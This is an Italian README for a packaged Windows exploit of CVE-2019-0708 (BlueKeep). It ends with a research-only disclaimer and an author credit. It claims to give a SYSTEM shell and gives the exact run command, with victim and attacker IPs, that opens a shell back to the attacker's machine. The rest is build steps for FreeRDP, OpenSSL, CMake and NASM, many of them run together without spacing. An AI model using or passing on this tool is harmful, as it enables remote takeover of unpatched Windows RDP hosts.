
CVE-2019-0708-EXP - versione Windows singolo file exe, dopo l'esecuzione ottiene direttamente una shell con privilegi System nella console corrente.
La PoC dell'autore è fornita esclusivamente a scopo di ricerca. Se il lettore utilizza questa PoC per altri scopi, ciò non è responsabilità dell'autore.
[toc]
CVE-2019-0708-EXP versione Windows è un singolo file eseguibile, non richiede Linux, Python, Ruby, ecc. Una volta eseguito, apre direttamente una shell con privilegi di Sistema nella console corrente.
La compilazione utilizza la modalità libreria statica con tutti i DLL inlined, integra netcat e OpenSSL, supporta la visualizzazione della barra di avanzamento e l'eco dei comandi nella shell.
CVE-2019-0708-EXP-Releasewfreerdp.exe /v:IP_Vittima /l:IP_Attaccante, ad esempio wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17E:\git\KernelResearch\FreeRDP-master\openssl.7z in C:\openssl\ per utilizzare l'ambiente precompilatocmake-3.15.3-win64-x64.msi come amministratoreC:\Program Files\CMake\bin alla variabile d'ambiente PATH"C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txtFreeRDP-master-restore.7zopenssl-1.0.2s.tar.gz in C:\openssl\ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msiC:\Perl64\bin alla variabile d'ambiente PATHperl Configure VC-WIN64Acd /d C:\openssl\ms\do_win64anmake -f ms\ntdll.maknmake -f ms\nt.maknmake -f ms\ntdll.mak testnmake -f ms\nt.mak testnmake -f ms\ntdll.mak installnmake -f ms\nt.mak installnmake -f ms\ntdll.mak cleannmake -f ms\nt.mak cleanlibeay32.lib e ssleay32.lib nella directory out32 e copiarli in C:\openssl\lib\nasm-2.14.02-installer-x64.exe come amministratoreC:\Program Files\NASM alla variabile d'ambiente PATHnasmBuildCustomizations.rar in C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\client->common->freerdp-client, fare clic destro, selezionare "Dipendenze di compilazione" -> "Personalizzazioni di compilazione", quindi spuntare la voce "nasm" (non "masm").asm qualsiasi nel progetto freerdp-client appare l'opzione "Compila" nel menu contestuale, l'installazione dell'ambiente Nasm è riuscita.
Autore: ZheJiang Guoli Security Technology, email: [email protected]